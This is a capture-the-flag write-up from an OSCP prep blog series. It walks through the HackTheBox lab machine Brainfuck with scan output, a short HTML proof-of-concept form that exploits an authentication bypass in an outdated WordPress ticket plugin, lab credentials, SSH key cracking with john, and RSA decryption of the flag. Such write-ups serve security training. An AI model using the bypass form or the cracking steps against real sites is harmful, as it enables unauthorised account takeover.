TJnull OSCP Prep Series
HackTheBox: BrainFuck [OSCP Prep]

HackTheBox: BrainFuck [OSCP Prep]


Box Info:

  • OS: Linux 🐧
  • Difficulty: Insane 🙀
  • Release: 14 Mar 2017 📅
  • IP: 10.10.10.17 💻
  • Box Creator: ch4p 😎

Hello there guys. Welcome to my 3rd post on the TJnull OSCP Prep Series. Today we’re going to be discussing Brainfuck from HackTheBox.

Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:

$ rustscan -a 10.10.10.3 -r 1-65535 -- -sV -sC -Pn
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUvFkWE1DxJj4OsU4DiVLjkxYV2a9pSlMS/78hpx0IejJaFilgNb+RFCyfyhIw5NvsZB6hZiNL0vPDh+MscPd75heIIgx9mczfamsrA2KODdkdgUJPCBWUnF9/VhYQhJpGvo4f6lAwLz7wnmcjhiXencMNkZcweADi5aK0Xp6iFxYcwx6+qy0891gQ5TnVVazkDJNA+QMUamxJRm1tQN5dp/+TeBecWJH2AxQFXsM4wPkIFaE0GsKvYDmGyfy1YL/Gn5IxEqVrhIEYkDH4BQsbvORNueOtJKHoys7EhPF+STpx6ZAXS6AXhS/nJMz6EvubzeGqfBOaDIZN9u5JuCdf
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCJcOJZuuBlw9xDXy+VPpezMomPfySGOjABaxw02cmRifvzWE57mh1hlQD6z44IF1lsuW9E2NNH4xB4d8U0O5b0=
|   256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOokdEAUqLEqEuY1CHNJ2xaDU+L+/0qb3XZO8UIZfrju
25/tcp  open  smtp     syn-ack Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     syn-ack Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) CAPA AUTH-RESP-CODE UIDL USER RESP-CODES PIPELINING
143/tcp open  imap     syn-ack Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 ID Pre-login IMAP4rev1 OK more post-login capabilities SASL-IR listed have LITERAL+ LOGIN-REFERRALS ENABLE IDLE
443/tcp open  ssl/http syn-ack nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/[email protected]/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/[email protected]/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after:  2027-04-11T11:19:29
| MD5:   cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
| SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
| -----BEGIN CERTIFICATE-----
| MIIFQzCCA6ugAwIBAgIJAI24F5h8eY+HMA0GCSqGSIb3DQEBCwUAMIGTMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV
| BAoMDkJyYWluZnVjayBMdGQuMQswCQYDVQQLDAJJVDEWMBQGA1UEAwwNYnJhaW5m
| dWNrLmh0YjEkMCIGCSqGSIb3DQEJARYVb3Jlc3Rpc0BicmFpbmZ1Y2suaHRiMB4X
| DTE3MDQxMzExMTkyOVoXDTI3MDQxMTExMTkyOVowgZMxCzAJBgNVBAYTAkdSMQ8w
| DQYDVQQIDAZBdHRpY2ExDzANBgNVBAcMBkF0aGVuczEXMBUGA1UECgwOQnJhaW5m
| dWNrIEx0ZC4xCzAJBgNVBAsMAklUMRYwFAYDVQQDDA1icmFpbmZ1Y2suaHRiMSQw
| IgYJKoZIhvcNAQkBFhVvcmVzdGlzQGJyYWluZnVjay5odGIwggGiMA0GCSqGSIb3
| DQEBAQUAA4IBjwAwggGKAoIBgQCjBI0m6FWgcLYONyxVeMgc+PuTFJMnMUjMb8BF
| t0PIDSCt10grCCfzBNDIqfU9byiokyYVvvD+sRoWJQfMjd3I3NXMxHwpcLM6X9oR
| Twt1iBBJRQkTnHOs1hyCmkiM+kn2W1xdL+mwBylAUlvUReLIDdS5anE7u95ApWsD
| TTUt/mMUl1DwnCqrNkt3czQzCNfCIwIhbaLjsoXsiVo1fFEr6UpsyiaXad9eTTsl
| EF9k3rByXrmP1WrkaFLqGhqS4v+rYtsyKGPngjAB664aAvB2sSI0/EuOTa7WOPcV
| NP3Tga+zx55qXPeo6nqCttOlAKKwiZqba5AgDAjSFdB6Q60dghWSuRYU999Ku6zA
| DdwP0BoT5+kcZJENY7wx1uzysSMrtCoi8E6bfx42UwNQe/UCDDXErXat90hTB+vV
| h2vaSdyR0tz3w1iIHBZH5/3rY3f+LyfE9fSg2TbGFgZNDq6O/iykVWb9SG+tl1fA
| RB208Y1/mOw0+84G9RIjLVMLb0kCAwEAAaOBlzCBlDAdBgNVHQ4EFgQUj12KscJg
| /6gSHzm+kzSN/psvik8wHwYDVR0jBBgwFoAUj12KscJg/6gSHzm+kzSN/psvik8w
| DAYDVR0TBAUwAwEB/zALBgNVHQ8EBAMCBeAwNwYDVR0RBDAwLoIRd3d3LmJyYWlu
| ZnVjay5odGKCGXN1cDNyczNjcjN0LmJyYWluZnVjay5odGIwDQYJKoZIhvcNAQEL
| BQADggGBAJ11TuRhhSQfq5NHXU5fV5VkCOPUx3yKsWjt93Qm8WDD2rJcZAq8jW59
| NHDWhzDlKZMyNYv8gKJ8k6HuG3f20yeifKZulGw/YsY6dDtTzO+tooBqzjWb9irh
| bpMIVXv1xBSuz+f5YGdzpvlMK/Ltt1nEQNjKXaTnjy7OGfp4isMZCzBZeKAKnjdn
| +s6TgFrFA94B56naXNaNLHvv9WcFKviwDTP2PtDz0fc9hbnZz8oxE5Q6/l50NGUK
| 6bGCVIjDJfM/SsWPLHb4J6chkJxlZZLmpid+s5PsKSdY0ZZ1Oxb20O2mla77hDSJ
| d43t/sZRBwWPEWxAHUR8Dj5pcrbCFyi57Qu4ENc5w7H0RhRyd0/OWs6ahn2ef4Qy
| DSWfdpd5CVBGdSLVlVSjzLcBDmWuyy8q5CTgJ3VzIzOreg93F2mVAF+tlNZRX9rc
| dFjsS0lwXWRZqd6642VuAtf4HoAFBh9PfBtUx+t1DxCXyY7OTwnvMsnNFg9fw11v
| krhc81zFeg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:03
Completed NSE at 15:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

I choose to go with HTTPS running on port 443. When dealing with HTTPS a good place to look at is for SSL certificate information which allows us to extract more information about the host.

Figure 1.0

We found a new virtual hostname called brainfuck.htb & a subdomain called sup3rs3cr3t.brainfuck.htb. Let’s added them to our /etc/hosts file. Let’s browse to brainfuck.htb

Figure 1.1

Take a look at the highlighted areas in Figure 1.1. You can see that we’re dealing with a WordPress site. Looking at the highlighted post there is an email address called [email protected], let’s keep that in mind. We can use WpScan to extract more information on the target WordPress site.

$ wpscan --url "https://brainfuck.htb" -e --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Sat Aug 28 13:22:26 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://brainfuck.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>

[+] WordPress theme in use: proficient
 | Location: https://brainfuck.htb/wp-content/themes/proficient/
 | Last Updated: 2021-08-18T00:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
 | [!] The version is out of date, the latest version is 3.0.51
 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: https://speciatheme.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:13 <=========================================================================================> (357 / 357) 100.00% Time: 00:00:13
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:01:26 <=======================================================================================> (2575 / 2575) 100.00% Time: 00:01:26

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:21 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:21

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:02 <================================================================================================> (71 / 71) 100.00% Time: 00:00:02

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:03 <=====================================================================================> (100 / 100) 100.00% Time: 00:00:03

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 28 13:24:52 2021
[+] Requests Done: 3301
[+] Cached Requests: 11
[+] Data Sent: 910.235 KB
[+] Data Received: 881.963 KB
[+] Memory used: 274.586 MB
[+] Elapsed time: 00:02:25

WpScan scan for what plugins are installed on the target WordPress site

$ wpscan --url "https://brainfuck.htb" --plugins-detection mixed --plugins-version-detection mixed --detection-mode mixed --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Sat Aug 28 13:30:48 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://brainfuck.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>

[+] WordPress theme in use: proficient
 | Location: https://brainfuck.htb/wp-content/themes/proficient/
 | Last Updated: 2021-08-18T00:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
 | [!] The version is out of date, the latest version is 3.0.51
 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: https://speciatheme.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'

[+] Enumerating All Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 01:02:16 <=====================================================================================> (94806 / 94806) 100.00% Time: 01:02:16
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: https://brainfuck.htb/wp-content/plugins/akismet/
 | Last Updated: 2021-08-23T18:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.11
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/akismet/readme.txt

[+] easy-wp-smtp
 | Location: https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/
 | Last Updated: 2021-07-13T07:46:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
 | [!] The version is out of date, the latest version is 1.4.7
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/, status: 200
 |
 | Version: 1.2.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | Readme: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | [!] The version is out of date, the latest version is 9.1.2
 | [!] Directory listing is enabled
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/, status: 200
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 28 14:34:00 2021
[+] Requests Done: 94961
[+] Cached Requests: 39
[+] Data Sent: 25.292 MB
[+] Data Received: 15.184 MB
[+] Memory used: 510.785 MB
[+] Elapsed time: 01:03:11

Let’s have a look at the plugin “wp-support-plus-responsive-ticket-system“, it seems to be outdated which is vulnerable to an authentication bypass. Have a look at this exploit POC at exploitdb.

Figure 1.2: Original POC

Adjust the POC according to our target.

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="admin">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Now we can host your exploit poc via an HTTP server. I named my exploit poc as “ticket-privsec.html“.

Figure 1.3: Serve file via HTTP Server
Figure 1.4: Trigger the exploit by supplying the username

Now we should be able to log in as user admin:

Figure 1.5

After getting admin access to a WordPress site. The next probable thing to do is trying to leverage this vulnerability in getting RCE on the server. I’ve tried to:

  • Injecting shell payload to the wordpress theme. [FAILED: No write access to any theme file].
  • Upload shell plugin. [Failed: Not sure why.]

I’ve tried poking around. The plugin “easy-wp-smtp” has disclosed sensitive information in its settings.

Figure 1.6
Figure 1.7

SMTP credentials of user Orestis:

  • Username: orestis
  • Password: kHGuERB29DNiNE

Since we have the SMTP login details, we can log in via an email client (Evolution, Thunderbird, …) to see if there are any sensitive emails in user Orestis mail inbox.

  • Email 1:

Figure 1.8
  • Email 2:

Figure 1.9

User orestis credentials for the secret forum are:

  • Username: orestis
  • Password: KIEnnfEKJ#9Umd0

We already found a subdomain named “sup3rs3cr3t.brainfuck.htb” when inspecting the HTTPS SSL Certificate. Let’s now have a look at it:

Figure 2.0

This subdomain is where the secret forum exists that is been discussed in Email 2 (Figure 1.9). Now login as user orestis. There should be 3 discussion nodes.

Figure 2.1

Node SSH Access: The conversation moves on and user Orestis is opening a new encrypted discussion node (Key) in which they’d be discussing about the SSH keys.

Figure 2.2

Node Key: This is complete gibberish. The chat is encrypted.

Figure 2.3

If you look close user Orestis always uses the sentence “Orestis – Hacking for fun and profit”. Maybe this might help us to decrypt the messages.

Figure 2.4
Figure 2.5
Figure 2.6

The key can either be “brainfuckmy” or “fuckmybrain“:

Figure 2.7

Decoded chat:

Oorestis: Hey give me the url for my key bitch :)
	  Orestis - Hacking for fun and profit
		
Admin: Say please and i just might do so...

Oorestis: Pleeeease....
          Orestis - Hacking for fun and profit

Admin: There you go you stupid fuck, I hope you remember your key password because I dont :)
       https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
	
Oorestis: No problem, I'll brute force it ;)
          Orestis - Hacking for fun and profit

Now we can grab Orestis’s private key from the given URL. The key seems to be encrypted. Let’s try to brute-forcing with john and find the ssh key private key.

$ ssh2john.py id_rsa > john-key-to-crack.txt
Figure 2.8

Now we can log in via SSH as user orestis

$ ssh [email protected] -i id_rsa
Enter passphase for key 'id_rsa': 3poulakia!
...
...
[email protected]:~$ 

Post-exploitation

Have a look at the user orestis home directory.

Figure 2.9

File encrypt.sage deals with some crypto stuff RSA to be precise (You will find variables like n, p, q, e, c). Let’s try to understand what’s happening. Check out the comments in the code:

# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script begins =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

nbits = 1024

password = open("/root/root.txt").read().strip()      # Reading the root flag (root.txt)
enc_pass = open("output.txt","w")                     # Open file output.txt in write mode
debug = open("debug.txt","w")                         # Open file debug.txt in write mode
m = Integer(int(password.encode('hex'),16))

# Generate random prime number
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

# Generate random prime number
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

n = p*q								# More Crypto stuff
phi = (p-1)*(q-1)					        # ...
e = ZZ.random_element(phi)			                # ...
while gcd(e, phi) != 1:				                # ...
    e = ZZ.random_element(phi)		                        # ...



c = pow(m, e, n)                                       # Cipher text is in variable "c"
enc_pass.write('Encrypted Password: '+str(c)+'\n')     # Cipher (c) text goes to output.txt
debug.write(str(p)+'\n')                               # p gets written to debug.txt
debug.write(str(q)+'\n')                               # q gets written to debug.txt
debug.write(str(e)+'\n')                               # e gets written to debug.txt


# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script ends here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


'''
> Here are the contents in the bellow files.
enc_pass.txt:
c (cipherText)=44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
'''

'''
debug.txt:
p=7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q=7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e=30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
'''

Found this RSA decryptor online that makes the job easy for me to extract the flag.

Figure 3.0

Got the root flag.


I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments